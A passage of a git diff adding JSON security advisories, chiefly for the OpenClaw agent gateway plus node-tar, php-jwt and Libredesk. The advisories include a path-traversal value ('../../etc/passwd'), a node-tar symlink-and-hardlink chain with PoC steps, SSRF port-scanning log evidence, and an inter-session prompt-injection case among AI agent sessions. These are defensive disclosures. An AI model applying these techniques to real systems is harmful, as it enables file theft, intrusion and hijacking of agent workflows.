`61d59a802869177d9cef52204767cd83357ab79e`\n- `openclaw` will be patched in the next planned release: `2026.2.14`.\n\n`clawdbot` is a legacy/deprecated package name; no patched version is currently planned. Migrate to `openclaw` and upgrade to `openclaw >= 2026.2.14`.\n\n## Workaround\nEnsure each Google Chat webhook target uses a unique webhook path so routing is never ambiguous.\n\n## Release Process Note\nThe advisory is pre-populated with the planned patched version. After the npm release is published, the remaining action should be to publish the advisory.\n\nThanks @vincentkoc for reporting.\n\n---\n\nFix commit 61d59a802869177d9cef52204767cd83357ab79e confirmed on main and in v2026.2.14. Upgrade to `openclaw >= 2026.2.14`.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:H/VA:N/SC:L/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "clawdbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2026.1.24-3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rq6g-px6m-c248" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/61d59a802869177d9cef52204767cd83357ab79e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284", + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:54:14Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w2cg-vxx6-5xjg/GHSA-w2cg-vxx6-5xjg.json b/advisories/github-reviewed/2026/02/GHSA-w2cg-vxx6-5xjg/GHSA-w2cg-vxx6-5xjg.json new file mode 100644 index 0000000000000..0164267c92b92 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-w2cg-vxx6-5xjg/GHSA-w2cg-vxx6-5xjg.json @@ -0,0 +1,82 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w2cg-vxx6-5xjg", + "modified": "2026-02-18T00:52:36Z", + "published": "2026-02-18T00:52:36Z", + "aliases": [], + "summary": "OpenClaw: denial of service through large base64 media files allocating large buffers before limit checks", + "details": "## Summary\n\nBase64-backed media inputs could be decoded into Buffers before enforcing decoded-size budgets. An attacker supplying oversized base64 payloads can force large allocations, causing memory pressure and denial of service.\n\n## Attack Scenario Notes\n\n- Recommended deployments bind the gateway to loopback by default and require gateway auth for HTTP endpoints. In that configuration, this is best modeled as a local/authorized DoS.\n- If an operator exposes the gateway to untrusted networks (or disables/weakens auth and rate limits), treat this as a higher-severity network DoS risk.\n\n## Affected Packages / Versions\n\n- openclaw (npm): <= 2026.2.13\n- clawdbot (npm): <= 2026.1.24-3\n\n## Fixed In\n\n- openclaw (npm): 2026.2.14 (planned)\n- clawdbot (npm): no patched release planned; migrate to openclaw\n\n## Fix Commit(s)\n\n- 31791233d60495725fa012745dde8d6ee69e9595\n\n## Credits\nThanks @vincentkoc for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "clawdbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2026.1.24-3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w2cg-vxx6-5xjg" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/31791233d60495725fa012745dde8d6ee69e9595" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:52:36Z", + "nvd_published_at": null + } +} \ No newline at end of file From 4c83c82c1a288397c6cf8ed3a4e02e78d8a87c96 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 00:58:59 +0000 Subject: [PATCH 146/215] Publish Advisories GHSA-2x45-7fc3-mxwq GHSA-5xfq-5mr7-426q GHSA-83g3-92jg-28cx GHSA-jqpq-mgvm-f9r6 GHSA-v6c6-vqqg-w888 GHSA-w5c7-9qqw-6645 GHSA-wgm6-9rvv-3438 GHSA-2x45-7fc3-mxwq --- .../GHSA-2x45-7fc3-mxwq.json | 81 +++++++++++++++++++ .../GHSA-5xfq-5mr7-426q.json | 63 +++++++++++++++ .../GHSA-83g3-92jg-28cx.json | 65 +++++++++++++++ .../GHSA-jqpq-mgvm-f9r6.json | 65 +++++++++++++++ .../GHSA-v6c6-vqqg-w888.json | 67 +++++++++++++++ .../GHSA-w5c7-9qqw-6645.json | 63 +++++++++++++++ .../GHSA-wgm6-9rvv-3438.json | 62 ++++++++++++++ .../GHSA-2x45-7fc3-mxwq.json | 44 ---------- 8 files changed, 466 insertions(+), 44 deletions(-) create mode 100644 advisories/github-reviewed/2025/07/GHSA-2x45-7fc3-mxwq/GHSA-2x45-7fc3-mxwq.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-5xfq-5mr7-426q/GHSA-5xfq-5mr7-426q.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-jqpq-mgvm-f9r6/GHSA-jqpq-mgvm-f9r6.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-v6c6-vqqg-w888/GHSA-v6c6-vqqg-w888.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-w5c7-9qqw-6645/GHSA-w5c7-9qqw-6645.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json delete mode 100644 advisories/unreviewed/2025/07/GHSA-2x45-7fc3-mxwq/GHSA-2x45-7fc3-mxwq.json diff --git a/advisories/github-reviewed/2025/07/GHSA-2x45-7fc3-mxwq/GHSA-2x45-7fc3-mxwq.json b/advisories/github-reviewed/2025/07/GHSA-2x45-7fc3-mxwq/GHSA-2x45-7fc3-mxwq.json new file mode 100644 index 0000000000000..2fb23983bab69 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-2x45-7fc3-mxwq/GHSA-2x45-7fc3-mxwq.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2x45-7fc3-mxwq", + "modified": "2026-02-18T00:55:29Z", + "published": "2025-07-31T21:31:53Z", + "aliases": [ + "CVE-2025-45769" + ], + "summary": "php-jwt contains weak encryption", + "details": "php-jwt v6.11.0 was discovered to contain weak encryption.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "firebase/php-jwt" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45769" + }, + { + "type": "WEB", + "url": "https://github.com/firebase/php-jwt/issues/611" + }, + { + "type": "WEB", + "url": "https://github.com/firebase/php-jwt/issues/618" + }, + { + "type": "WEB", + "url": "https://github.com/firebase/php-jwt/pull/613" + }, + { + "type": "WEB", + "url": "https://github.com/firebase/php-jwt/commit/6b80341bf57838ea2d011487917337901cd71576" + }, + { + "type": "WEB", + "url": "https://gist.github.com/ZupeiNie/83756316c4c24fe97a50176a92608db3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/firebase/php-jwt" + }, + { + "type": "WEB", + "url": "https://github.com/firebase/php-jwt/releases/tag/v7.0.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-326" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:55:29Z", + "nvd_published_at": "2025-07-31T20:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-5xfq-5mr7-426q/GHSA-5xfq-5mr7-426q.json b/advisories/github-reviewed/2026/02/GHSA-5xfq-5mr7-426q/GHSA-5xfq-5mr7-426q.json new file mode 100644 index 0000000000000..8d5832619f640 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-5xfq-5mr7-426q/GHSA-5xfq-5mr7-426q.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5xfq-5mr7-426q", + "modified": "2026-02-18T00:57:30Z", + "published": "2026-02-18T00:57:30Z", + "aliases": [], + "summary": "OpenClaw's unsanitized session ID enables path traversal in transcript file operations", + "details": "## Description\n\nOpenClaw versions **<= 2026.2.9** construct transcript file paths using an unsanitized `sessionId` and also accept `sessionFile` paths without enforcing that they stay within the agent sessions directory.\n\nA crafted `sessionId` and/or `sessionFile` (example: `../../etc/passwd`) can cause path traversal when the gateway performs transcript file read/write operations.\n\n**Preconditions:** an attacker must be able to authenticate to the gateway (gateway token/password). By default the gateway binds to `loopback` (local-only); configurations that expose the gateway widen the attack surface.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `<= 2026.2.9`\n- Fixed: `>= 2026.2.12`\n\n## Fix\n\nFixed by validating session IDs (rejecting path separators / traversal sequences) and enforcing sessions-directory containment for session transcript file operations.\n\n### Fix Commit(s)\n\n- `4199f9889f0c307b77096a229b9e085b8d856c26`\n\n### Additional Hardening\n\n- `cab0abf52ac91e12ea7a0cf04fff315cf0c94d64`\n\n## Mitigation\n\nUpgrade to `openclaw >= 2026.2.12`.\n\nThanks @akhmittra for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5xfq-5mr7-426q" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/4199f9889f0c307b77096a229b9e085b8d856c26" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.12" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:57:30Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json b/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json new file mode 100644 index 0000000000000..9ca7ca5d742ad --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-83g3-92jg-28cx/GHSA-83g3-92jg-28cx.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-83g3-92jg-28cx", + "modified": "2026-02-18T00:57:13Z", + "published": "2026-02-18T00:57:13Z", + "aliases": [ + "CVE-2026-26960" + ], + "summary": "Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in node-tar Extraction", + "details": "### Summary\n`tar.extract()` in Node `tar` allows an attacker-controlled archive to create a hardlink inside the extraction directory that points to a file outside the extraction root, using default options.\n\nThis enables **arbitrary file read and write** as the extracting user (no root, no chmod, no `preservePaths`).\n\nSeverity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive.\n\n### Details\nThe bypass chain uses two symlinks plus one hardlink:\n\n1. `a/b/c/up -> ../..`\n2. `a/b/escape -> c/up/../..`\n3. `exfil` (hardlink) -> `a/b/escape/`\n\nWhy this works:\n\n- Linkpath checks are string-based and do not resolve symlinks on disk for hardlink target safety.\n - See `STRIPABSOLUTEPATH` logic in:\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:255`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:268`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:281`\n\n- Hardlink extraction resolves target as `path.resolve(cwd, entry.linkpath)` and then calls `fs.link(target, destination)`.\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:566`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:567`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:703`\n\n- Parent directory safety checks (`mkdir` + symlink detection) are applied to the destination path of the extracted entry, not to the resolved hardlink target path.\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:617`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:619`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:27`\n - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:101`\n\nAs a result, `exfil` is created inside extraction root but linked to an external file. The PoC confirms shared inode and successful read+write via `exfil`.\n\n### PoC\n[hardlink.js](https://github.com/user-attachments/files/25240082/hardlink.js)\nEnvironment used for validation:\n\n- Node: `v25.4.0`\n- tar: `7.5.7`\n- OS: macOS Darwin 25.2.0\n- Extract options: defaults (`tar.extract({ file, cwd })`)\n\nSteps:\n\n1. Prepare/locate a `tar` module. If `require('tar')` is not available locally, set `TAR_MODULE` to an absolute path to a tar package directory.\n\n2. Run:\n\n```bash\nTAR_MODULE=\"$(cd '../tar-audit-setuid - CVE/node_modules/tar' && pwd)\" node hardlink.js\n```\n\n3. Expected vulnerable output (key lines):\n\n```text\nsame_inode=true\nread_ok=true\nwrite_ok=true\nresult=VULNERABLE\n```\n\nInterpretation:\n\n- `same_inode=true`: extracted `exfil` and external secret are the same file object.\n- `read_ok=true`: reading `exfil` leaks external content.\n- `write_ok=true`: writing `exfil` modifies external file.\n\n### Impact\nVulnerability type:\n\n- Arbitrary file read/write via archive extraction path confusion and link resolution.\n\nWho is impacted:\n\n- Any application/service that extracts attacker-controlled tar archives with Node `tar` defaults.\n- Impact scope is the privileges of the extracting process user.\n\nPotential outcomes:\n\n- Read sensitive files reachable by the process user.\n- Overwrite writable files outside extraction root.\n- Escalate impact depending on deployment context (keys, configs, scripts, app data).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "tar" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.5.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx" + }, + { + "type": "WEB", + "url": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384" + }, + { + "type": "WEB", + "url": "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/isaacs/node-tar" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:57:13Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-jqpq-mgvm-f9r6/GHSA-jqpq-mgvm-f9r6.json b/advisories/github-reviewed/2026/02/GHSA-jqpq-mgvm-f9r6/GHSA-jqpq-mgvm-f9r6.json new file mode 100644 index 0000000000000..d0ca2bb515887 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-jqpq-mgvm-f9r6/GHSA-jqpq-mgvm-f9r6.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jqpq-mgvm-f9r6", + "modified": "2026-02-18T00:55:50Z", + "published": "2026-02-18T00:55:50Z", + "aliases": [], + "summary": "OpenClaw: Command hijacking via unsafe PATH handling (bootstrapping + node-host PATH overrides)", + "details": "# Command hijacking via PATH handling\n\n**Discovered:** 2026-02-04\n**Reporter:** @akhmittra\n\n## Summary\n\nOpenClaw previously accepted untrusted PATH sources in limited situations. In affected versions, this could cause OpenClaw to resolve and execute an unintended binary (\"command hijacking\") when running host commands.\n\nThis issue primarily matters when OpenClaw is relying on allowlist/safe-bin protections and expects `PATH` to be trustworthy.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `< 2026.2.14`\n- Patched: `>= 2026.2.14` (planned next release)\n\n## What Is Required To Trigger This\n\n### A) Node Host PATH override (remote command hijack)\n\nAn attacker needs all of the following:\n\n- Authenticated/authorized access to an execution surface that can invoke node-host execution (for example, a compromised gateway or a caller that can issue `system.run`).\n- A node host connected and exposing `system.run`.\n- A configuration where allowlist/safe-bins are expected to restrict execution (this is not meaningful if full arbitrary exec is already allowed).\n- The ability to pass request-scoped environment overrides (specifically `PATH`) into `system.run`.\n- A way to place an attacker-controlled executable earlier in `PATH` (for example, a writable directory on the node host), with a name that matches an allowlisted/safe-bin command that OpenClaw will run.\n\nNotes:\n\n- OpenClaw deployments commonly require a gateway token/password (or equivalent transport authentication). This should not be treated as unauthenticated Internet RCE.\n- This scenario typically depends on **non-standard / misconfigured deployments** (for example, granting untrusted parties access to invoke node-host execution or otherwise exposing a privileged execution surface beyond the intended trust boundary).\n\n### B) Project-local PATH bootstrapping (local command hijack)\n\nAn attacker needs all of the following:\n\n- The victim runs OpenClaw from within an attacker-controlled working directory (for example, cloning and running inside a malicious repository).\n- That directory contains a `node_modules/.bin/openclaw` and additional attacker-controlled executables in the same directory.\n- OpenClaw subsequently executes a command by name (resolved via `PATH`) that matches one of those attacker-controlled executables.\n\n## Fix\n\n- Project-local `node_modules/.bin` PATH bootstrapping is now **disabled by default**. If explicitly enabled, it is **append-only** (never prepended) via `OPENCLAW_ALLOW_PROJECT_LOCAL_BIN=1`.\n- Node Host now ignores request-scoped `PATH` overrides.\n\n## Fix Commit(s)\n\n- 013e8f6b3be3333a229a066eef26a45fec47ffcc\n\nThanks @akhmittra for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jqpq-mgvm-f9r6" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/013e8f6b3be3333a229a066eef26a45fec47ffcc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427", + "CWE-78", + "CWE-807" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:55:50Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-v6c6-vqqg-w888/GHSA-v6c6-vqqg-w888.json b/advisories/github-reviewed/2026/02/GHSA-v6c6-vqqg-w888/GHSA-v6c6-vqqg-w888.json new file mode 100644 index 0000000000000..62070785cdb68 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-v6c6-vqqg-w888/GHSA-v6c6-vqqg-w888.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6c6-vqqg-w888", + "modified": "2026-02-18T00:57:48Z", + "published": "2026-02-18T00:57:48Z", + "aliases": [], + "summary": "OpenClaw affected by potential code execution via unsafe hook module path handling in Gateway", + "details": "## Summary\n\nOpenClaw Gateway supports hook mappings with optional JavaScript/TypeScript transform modules. In affected versions, the gateway did not sufficiently constrain configured module paths before passing them to dynamic `import()`. Under some configurations, a user who can modify gateway configuration could cause the gateway process to load and execute an unintended local module.\n\n## Impact\n\nPotential code execution in the OpenClaw gateway Node.js process.\n\nThis requires access that can modify gateway configuration (for example via the gateway config endpoints). Treat such access as high privilege.\n\n## Affected Packages / Versions\n\n- npm package: `openclaw`\n- Affected: `>= 2026.1.5` and `<= 2026.2.13`\n\n## Patched Versions\n\n- `>= 2026.2.14`\n\n## Fix Commit(s)\n\n- `a0361b8ba959e8506dc79d638b6e6a00d12887e4` (restrict hook transform module loading)\n- `35c0e66ed057f1a9f7ad2515fdcef516bd6584ce` (harden hooks module loading)\n\n## Mitigation\n\n- Upgrade to `2026.2.14` or newer.\n- Avoid exposing gateway configuration endpoints to untrusted networks.\n- Review config for unsafe values:\n - `hooks.mappings[].transform.module`\n - `hooks.internal.handlers[].module`\n\nThanks @222n5 for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.5" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v6c6-vqqg-w888" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/35c0e66ed057f1a9f7ad2515fdcef516bd6584ce" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/a0361b8ba959e8506dc79d638b6e6a00d12887e4" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:57:48Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w5c7-9qqw-6645/GHSA-w5c7-9qqw-6645.json b/advisories/github-reviewed/2026/02/GHSA-w5c7-9qqw-6645/GHSA-w5c7-9qqw-6645.json new file mode 100644 index 0000000000000..2a26f52c37895 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-w5c7-9qqw-6645/GHSA-w5c7-9qqw-6645.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w5c7-9qqw-6645", + "modified": "2026-02-18T00:56:51Z", + "published": "2026-02-18T00:56:51Z", + "aliases": [], + "summary": "OpenClaw inter-session prompts could be treated as direct user instructions", + "details": "## Summary\n\nInter-session messages sent via `sessions_send` could be interpreted as direct end-user instructions because they were persisted as `role: \"user\"` without provenance metadata.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.12` (i.e. `< 2026.2.13`)\n- Fixed in: `2026.2.13` (patched versions `>= 2026.2.13`)\n\n## Impact\n\nA delegated or internal session could inject instructions into another session that appeared equivalent to externally-originated user input.\n\nThis is an instruction-provenance confusion issue (confused-deputy style), which can lead to unintended privileged behavior in workflows that trust `role: \"user\"` as a sole authority signal.\n\n## Technical details\n\nBefore the fix, routed inter-session prompts were stored as regular user turns without a verifiable source marker.\n\nAs a result, downstream workers and transcript readers could not distinguish:\n- External user input\n- Internal inter-session routed input\n\n## Fix\n\nOpenClaw now carries explicit input provenance end-to-end for routed prompts.\n\nKey changes:\n- Added structured provenance model (`inputProvenance`) with `kind` values including `inter_session`.\n- `sessions_send` and agent-to-agent steps now set inter-session provenance when invoking target runs.\n- Provenance is persisted on user messages as `message.provenance.kind = \"inter_session\"` (role remains `user` for provider compatibility).\n- Transcript readers and memory helpers were updated to respect provenance and avoid treating inter-session prompts as external user-originated input.\n- Runtime context rebuilding now annotates inter-session turns with an explicit in-memory marker (`[Inter-session message]`) for clearer model-side disambiguation.\n- Regression tests were added for transcript parsing, session tools flow, runner sanitization, and memory hook behavior.\n\n## Fix Commit(s)\n\n- `85409e401b6586f83954cb53552395d7aab04797`\n\n## Workarounds\n\nIf immediate upgrade is not possible:\n- Disable or restrict `sessions_send` in affected environments.\n- Do not use role alone as an authority boundary; require provenance-aware checks in orchestration logic.\n\n## Credit\n\nReported by @anbecker.\n\nThanks @anbecker for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w5c7-9qqw-6645" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/85409e401b6586f83954cb53552395d7aab04797" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.12" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:56:51Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json b/advisories/github-reviewed/2026/02/GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json new file mode 100644 index 0000000000000..796e7ea500aaa --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json @@ -0,0 +1,62 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wgm6-9rvv-3438", + "modified": "2026-02-18T00:56:30Z", + "published": "2026-02-18T00:56:30Z", + "aliases": [ + "CVE-2026-26957" + ], + "summary": "Libredesk has a SSRF Vulnerability in Webhooks", + "details": "**Date:** 2025-12-07\n**Vulnerability:** Server-Side Request Forgery (SSRF)\n**Component:** Webhooks Module\n\n## Executive Summary\nA critical security vulnerability exists in the LibreDesk Webhooks module that allows an authenticated \"Application Admin\" to compromise the underlying cloud infrastructure or internal corporate network where this service is being hosted.\n\nThe application fails to validate destination URLs for webhooks. This allows an attacker to force the server to make HTTP requests to arbitrary internal destinations.\n\n## Confirmed Attack Vectors\n\n### 1. Internal Port Scanning (Network Mapping)\nAttackers can map the internal network by observing the difference between successful connections and connection errors. This works even if the response body is not returned.\n\n**Proof of Exploitation (from Server Logs):**\n* **Open Port (8890)**: The server connects successfully.\n ```text\n timestamp=... level=info message=\"webhook delivered successfully\" ... status_code=200\n ```\n* **Closed Port (8891)**: The server fails to connect.\n ```text\n timestamp=... level=error message=\"webhook delivery failed\" ... error=\"... connect: connection refused\"\n ```\n\n**Impact**: An attacker can identify running services (databases, caches, internal apps) on the local network (e.g., `localhost`, `192.168.x.x`).\n\n### 2. Information Leakage (Error-Based)\nIf the internal service returns a non-2xx response (e.g., 403 Forbidden, 404 Not Found, 500 Error), the application **logs the full response body**.\n\n**Proof of Exploitation (from Server Logs):**\n```text\ntimestamp=... level=error message=\"webhook delivery failed\" ... \nresponse=\"{\\\"secret_key\\\": \\\"xxx123\\\", \\\"role\\\": \\\"admin\\\"}\"\n```\n\n**Impact**: An attacker can extract sensitive data by targeting endpoints that return errors or by forcing errors on internal services.\n\n## Technical Root Cause\n1. **Missing Input Validation**: `cmd/webhooks.go` only checks if the URL is empty, not if it resolves to a private IP.\n2. **Unrestricted HTTP Client**: `internal/webhook/webhook.go` uses a default `http.Client` that follows redirects and connects to any IP.\n3. **Verbose Error Logging**: The application logs the full response body on failure, creating a side-channel for data exfiltration.\n\n## Remediation Required\nTo prevent this, the application must implement **Defense in Depth**:\n\n1. **Input Validation**: Block URLs resolving to private IP ranges (RFC 1918) and Link-Local addresses.\n2. **Safe HTTP Client**: Use a custom `http.Transport` that verifies the destination IP address *after* DNS resolution to prevent DNS rebinding attacks.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/abhinavxd/libredesk" + }, + "ranges": [ + { + "type": 